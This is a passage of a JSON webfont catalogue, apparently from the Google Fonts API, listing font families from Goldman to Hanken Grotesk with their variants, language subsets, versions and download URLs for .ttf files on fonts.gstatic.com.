],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v15\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/goldman/v15/pe0uMIWbN4JFplR2LDJ4Bt-7G98.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/goldman/v15/pe0rMIWbN4JFplR2FI5XIteQB9Zra1U.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Gorditas\",\n      \"variants\": [\n        \"regular\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v20\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/gorditas/v20/ll8_K2aTVD26DsPEtQDoDa4AlxYb.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/gorditas/v20/ll84K2aTVD26DsPEtThUIooIvAoShA1i.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Gothic A1\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\"\n      ],\n      \"subsets\": [\n        \"korean\",\n        \"latin\"\n      ],\n      \"version\": \"v13\",\n      \"lastModified\": \"2022-09-27\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/gothica1/v13/CSR74z5ZnPydRjlCCwlCCMcqYtd2vfwk.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/gothica1/v13/CSR44z5ZnPydRjlCCwlCpOYKSPl6tOU9Eg.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/gothica1/v13/CSR44z5ZnPydRjlCCwlCwOUKSPl6tOU9Eg.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/gothica1/v13/CSR94z5ZnPydRjlCCwl6bM0uQNJmvQ.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/gothica1/v13/CSR44z5ZnPydRjlCCwlCmOQKSPl6tOU9Eg.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/gothica1/v13/CSR44z5ZnPydRjlCCwlCtOMKSPl6tOU9Eg.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/gothica1/v13/CSR44z5ZnPydRjlCCwlC0OIKSPl6tOU9Eg.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/gothica1/v13/CSR44z5ZnPydRjlCCwlCzOEKSPl6tOU9Eg.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/gothica1/v13/CSR44z5ZnPydRjlCCwlC6OAKSPl6tOU9Eg.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Gotu\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"devanagari\",\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v14\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/gotu/v14/o-0FIpksx3QOlH0Lioh6-hU.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Goudy Bookletter 1911\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v15\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/goudybookletter1911/v15/sykt-z54laciWfKv-kX8krex0jDiD2HbY6I5tRbXZ4IXAA.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Gowun Batang\",\n      \"variants\": [\n        \"regular\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"korean\",\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v7\",\n      \"lastModified\": \"2022-09-27\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/gowunbatang/v7/ijwSs5nhRMIjYsdSgcMa3wRhXLH-yuAtLw.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/gowunbatang/v7/ijwNs5nhRMIjYsdSgcMa3wRZ4J7awssxJii23w.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Gowun Dodum\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"korean\",\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v7\",\n      \"lastModified\": \"2022-09-27\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/gowundodum/v7/3Jn5SD_00GqwlBnWc1TUJF0FfORL0fNy.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Graduate\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v13\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/graduate/v13/C8cg4cs3o2n15t_2YxgR6X2NZAn2.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Grand Hotel\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v13\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/grandhotel/v13/7Au7p_IgjDKdCRWuR1azpmQNEl0O0kEx.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Grandstander\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\",\n        \"100italic\",\n        \"200italic\",\n        \"300italic\",\n        \"italic\",\n        \"500italic\",\n        \"600italic\",\n        \"700italic\",\n        \"800italic\",\n        \"900italic\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v11\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/grandstander/v11/ga6fawtA-GpSsTWrnNHPCSIMZhhKpFjyNZIQD1-_D3jWttFGmQk.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/grandstander/v11/ga6fawtA-GpSsTWrnNHPCSIMZhhKpFjyNZIQD9--D3jWttFGmQk.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/grandstander/v11/ga6fawtA-GpSsTWrnNHPCSIMZhhKpFjyNZIQDwG-D3jWttFGmQk.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/grandstander/v11/ga6fawtA-GpSsTWrnNHPCSIMZhhKpFjyNZIQD1--D3jWttFGmQk.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/grandstander/v11/ga6fawtA-GpSsTWrnNHPCSIMZhhKpFjyNZIQD22-D3jWttFGmQk.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/grandstander/v11/ga6fawtA-GpSsTWrnNHPCSIMZhhKpFjyNZIQD4G5D3jWttFGmQk.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/grandstander/v11/ga6fawtA-GpSsTWrnNHPCSIMZhhKpFjyNZIQD7i5D3jWttFGmQk.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/grandstander/v11/ga6fawtA-GpSsTWrnNHPCSIMZhhKpFjyNZIQD9-5D3jWttFGmQk.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/grandstander/v11/ga6fawtA-GpSsTWrnNHPCSIMZhhKpFjyNZIQD_a5D3jWttFGmQk.ttf\",\n        \"100italic\": \"http://fonts.gstatic.com/s/grandstander/v11/ga6ZawtA-GpSsTWrnNHPCSImbyq1fDGZrzwXGpf95zrcsvNDiQlBYQ.ttf\",\n        \"200italic\": \"http://fonts.gstatic.com/s/grandstander/v11/ga6ZawtA-GpSsTWrnNHPCSImbyq1fDGZrzwXGpf9ZzvcsvNDiQlBYQ.ttf\",\n        \"300italic\": \"http://fonts.gstatic.com/s/grandstander/v11/ga6ZawtA-GpSsTWrnNHPCSImbyq1fDGZrzwXGpf9uTvcsvNDiQlBYQ.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/grandstander/v11/ga6ZawtA-GpSsTWrnNHPCSImbyq1fDGZrzwXGpf95zvcsvNDiQlBYQ.ttf\",\n        \"500italic\": \"http://fonts.gstatic.com/s/grandstander/v11/ga6ZawtA-GpSsTWrnNHPCSImbyq1fDGZrzwXGpf91TvcsvNDiQlBYQ.ttf\",\n        \"600italic\": \"http://fonts.gstatic.com/s/grandstander/v11/ga6ZawtA-GpSsTWrnNHPCSImbyq1fDGZrzwXGpf9OTzcsvNDiQlBYQ.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/grandstander/v11/ga6ZawtA-GpSsTWrnNHPCSImbyq1fDGZrzwXGpf9ADzcsvNDiQlBYQ.ttf\",\n        \"800italic\": \"http://fonts.gstatic.com/s/grandstander/v11/ga6ZawtA-GpSsTWrnNHPCSImbyq1fDGZrzwXGpf9ZzzcsvNDiQlBYQ.ttf\",\n        \"900italic\": \"http://fonts.gstatic.com/s/grandstander/v11/ga6ZawtA-GpSsTWrnNHPCSImbyq1fDGZrzwXGpf9TjzcsvNDiQlBYQ.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Grape Nuts\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v2\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/grapenuts/v2/syk2-yF4iLM2RfKj4F7k3tLvol2RN1E.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Gravitas One\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v15\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/gravitasone/v15/5h1diZ4hJ3cblKy3LWakKQmaDWRNr3DzbQ.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Great Vibes\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v14\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/greatvibes/v14/RWmMoKWR9v4ksMfaWd_JN-XCg6UKDXlq.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Grechen Fuemen\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v7\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/grechenfuemen/v7/vEFI2_tHEQ4d5ObgKxBzZh0MAWgc-NaXXq7H.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Grenze\",\n      \"variants\": [\n        \"100\",\n        \"100italic\",\n        \"200\",\n        \"200italic\",\n        \"300\",\n        \"300italic\",\n        \"regular\",\n        \"italic\",\n        \"500\",\n        \"500italic\",\n        \"600\",\n        \"600italic\",\n        \"700\",\n        \"700italic\",\n        \"800\",\n        \"800italic\",\n        \"900\",\n        \"900italic\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v14\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/grenze/v14/O4ZRFGb7hR12BxqPm2IjuAkalnmd.ttf\",\n        \"100italic\": \"http://fonts.gstatic.com/s/grenze/v14/O4ZXFGb7hR12BxqH_VpHsg04k2md0kI.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/grenze/v14/O4ZQFGb7hR12BxqPN0MDkicWn2CEyw.ttf\",\n        \"200italic\": \"http://fonts.gstatic.com/s/grenze/v14/O4ZWFGb7hR12BxqH_Vrrky0SvWWUy1uW.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/grenze/v14/O4ZQFGb7hR12BxqPU0ADkicWn2CEyw.ttf\",\n        \"300italic\": \"http://fonts.gstatic.com/s/grenze/v14/O4ZWFGb7hR12BxqH_VqPkC0SvWWUy1uW.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/grenze/v14/O4ZTFGb7hR12Bxq3_2gnmgwKlg.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/grenze/v14/O4ZRFGb7hR12BxqH_WIjuAkalnmd.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/grenze/v14/O4ZQFGb7hR12BxqPC0EDkicWn2CEyw.ttf\",\n        \"500italic\": \"http://fonts.gstatic.com/s/grenze/v14/O4ZWFGb7hR12BxqH_VrXkS0SvWWUy1uW.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/grenze/v14/O4ZQFGb7hR12BxqPJ0YDkicWn2CEyw.ttf\",\n        \"600italic\": \"http://fonts.gstatic.com/s/grenze/v14/O4ZWFGb7hR12BxqH_Vr7li0SvWWUy1uW.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/grenze/v14/O4ZQFGb7hR12BxqPQ0cDkicWn2CEyw.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/grenze/v14/O4ZWFGb7hR12BxqH_Vqfly0SvWWUy1uW.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/grenze/v14/O4ZQFGb7hR12BxqPX0QDkicWn2CEyw.ttf\",\n        \"800italic\": \"http://fonts.gstatic.com/s/grenze/v14/O4ZWFGb7hR12BxqH_VqDlC0SvWWUy1uW.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/grenze/v14/O4ZQFGb7hR12BxqPe0UDkicWn2CEyw.ttf\",\n        \"900italic\": \"http://fonts.gstatic.com/s/grenze/v14/O4ZWFGb7hR12BxqH_VqnlS0SvWWUy1uW.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Grenze Gotisch\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v12\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/grenzegotisch/v12/Fh4hPjjqNDz1osh_jX9YfjudpBJBNV5y5wf_k1i5Lz5UcICdYPSd_w.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/grenzegotisch/v12/Fh4hPjjqNDz1osh_jX9YfjudpBJBNV5y5wf_k1i5rz9UcICdYPSd_w.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/grenzegotisch/v12/Fh4hPjjqNDz1osh_jX9YfjudpBJBNV5y5wf_k1i5cT9UcICdYPSd_w.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/grenzegotisch/v12/Fh4hPjjqNDz1osh_jX9YfjudpBJBNV5y5wf_k1i5Lz9UcICdYPSd_w.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/grenzegotisch/v12/Fh4hPjjqNDz1osh_jX9YfjudpBJBNV5y5wf_k1i5HT9UcICdYPSd_w.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/grenzegotisch/v12/Fh4hPjjqNDz1osh_jX9YfjudpBJBNV5y5wf_k1i58ThUcICdYPSd_w.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/grenzegotisch/v12/Fh4hPjjqNDz1osh_jX9YfjudpBJBNV5y5wf_k1i5yDhUcICdYPSd_w.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/grenzegotisch/v12/Fh4hPjjqNDz1osh_jX9YfjudpBJBNV5y5wf_k1i5rzhUcICdYPSd_w.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/grenzegotisch/v12/Fh4hPjjqNDz1osh_jX9YfjudpBJBNV5y5wf_k1i5hjhUcICdYPSd_w.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Grey Qo\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v7\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/greyqo/v7/BXRrvF_Nmv_TyXxNDOtQ9Wf0QcE.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Griffy\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v21\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/griffy/v21/FwZa7-ox2FQh9kfwSNSEwM2zpA.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Gruppo\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v16\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/gruppo/v16/WwkfxPmzE06v_ZWFWXDAOIEQUQ.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Gudea\",\n      \"variants\": [\n        \"regular\",\n        \"italic\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v15\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/gudea/v15/neIFzCqgsI0mp-CP9IGON7Ez.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/gudea/v15/neILzCqgsI0mp9CN_oWsMqEzSJQ.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/gudea/v15/neIIzCqgsI0mp9gz26WGHK06UY30.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Gugi\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"korean\",\n        \"latin\"\n      ],\n      \"version\": \"v13\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/gugi/v13/A2BVn5dXywshVA6A9DEfgqM.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Gulzar\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"arabic\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v6\",\n      \"lastModified\": \"2023-01-06\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/gulzar/v6/Wnz6HAc9eB3HB2ILYTwZqg_MPQ.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Gupter\",\n      \"variants\": [\n        \"regular\",\n        \"500\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v14\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/gupter/v14/2-cm9JNmxJqPO1QUYZa_Wu_lpA.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/gupter/v14/2-cl9JNmxJqPO1Qslb-bUsT5rZhaZg.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/gupter/v14/2-cl9JNmxJqPO1Qs3bmbUsT5rZhaZg.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Gurajada\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"telugu\"\n      ],\n      \"version\": \"v15\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/gurajada/v15/FwZY7-Qx308m-l-0Kd6A4sijpFu_.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Gwendolyn\",\n      \"variants\": [\n        \"regular\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v5\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/gwendolyn/v5/qkBXXvoO_M3CSss-d7ee5JRLkAXbMQ.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/gwendolyn/v5/qkBSXvoO_M3CSss-d7emWLtvmC7HONiSFQ.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Habibi\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v21\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/habibi/v21/CSR-4zFWkuqcTTNCShJeZOYySQ.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Hachi Maru Pop\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"japanese\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v17\",\n      \"lastModified\": \"2022-09-27\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/hachimarupop/v17/HI_TiYoRLqpLrEiMAuO9Ysfz7rW1EM_btd8u.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Hahmlet\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\"\n      ],\n      \"subsets\": [\n        \"korean\",\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v9\",\n      \"lastModified\": \"2022-09-27\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/hahmlet/v9/BngXUXpCQ3nKpIo0TfPyfCdXfaeU4RhKOdjobsO-aVxn.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/hahmlet/v9/BngXUXpCQ3nKpIo0TfPyfCdXfaeU4RjKONjobsO-aVxn.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/hahmlet/v9/BngXUXpCQ3nKpIo0TfPyfCdXfaeU4RgUONjobsO-aVxn.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/hahmlet/v9/BngXUXpCQ3nKpIo0TfPyfCdXfaeU4RhKONjobsO-aVxn.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/hahmlet/v9/BngXUXpCQ3nKpIo0TfPyfCdXfaeU4Rh4ONjobsO-aVxn.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/hahmlet/v9/BngXUXpCQ3nKpIo0TfPyfCdXfaeU4RiUP9jobsO-aVxn.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/hahmlet/v9/BngXUXpCQ3nKpIo0TfPyfCdXfaeU4RitP9jobsO-aVxn.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/hahmlet/v9/BngXUXpCQ3nKpIo0TfPyfCdXfaeU4RjKP9jobsO-aVxn.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/hahmlet/v9/BngXUXpCQ3nKpIo0TfPyfCdXfaeU4RjjP9jobsO-aVxn.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Halant\",\n      \"variants\": [\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"devanagari\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v13\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"300\": \"http://fonts.gstatic.com/s/halant/v13/u-490qaujRI2Pbsvc_pCmwZqcwdRXg.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/halant/v13/u-4-0qaujRI2PbsX39Jmky12eg.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/halant/v13/u-490qaujRI2PbsvK_tCmwZqcwdRXg.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/halant/v13/u-490qaujRI2PbsvB_xCmwZqcwdRXg.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/halant/v13/u-490qaujRI2PbsvY_1CmwZqcwdRXg.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Hammersmith One\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v17\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/hammersmithone/v17/qWcyB624q4L_C4jGQ9IK0O_dFlnbshsks4MRXw.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Hanalei\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v23\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/hanalei/v23/E21n_dD8iufIjBRHXzgmVydREus.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Hanalei Fill\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v21\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/hanaleifill/v21/fC1mPYtObGbfyQznIaQzPQiMVwLBplm9aw.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Handlee\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v14\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/handlee/v14/-F6xfjBsISg9aMakDmr6oilJ3ik.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Hanken Grotesk\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\",\n        \"100italic\",\n        \"200italic\",\n        \"300italic\",\n        \"italic\",\n        \"500italic\",\n        \"600italic\",\n        \"700italic\",\n        \"800italic\",\n        \"900italic\"\n      ],\n      \"subsets\": [\n        \"cyrillic-ext\",\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v5\",\n      \"lastModified\": \"2023-01-18\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/hankengrotesk/v5/ieVq2YZDLWuGJpnzaiwFXS9tYvBRzyFLlZg_f_Ncs2da4fpNzXhRKA.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/hankengrotesk/v5/ieVq2YZDLWuGJpnzaiwFXS9tYvBRzyFLlZg_f_NcM2Za4fpNzXhRKA.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/hankengrotesk/v5/ieVq2YZDLWuGJpnzaiwFXS9tYvBRzyFLlZg_f_Nc7WZa4fpNzXhRKA.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/hankengrotesk/v5/ieVq2YZDLWuGJpnzaiwFXS9tYvBRzyFLlZg_f_Ncs2Za4fpNzXhRKA.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/hankengrotesk/v5/ieVq2YZDLWuGJpnzaiwFXS9tYvBRzyFLlZg_f_NcgWZa4fpNzXhRKA.ttf\",\n        \"600\": 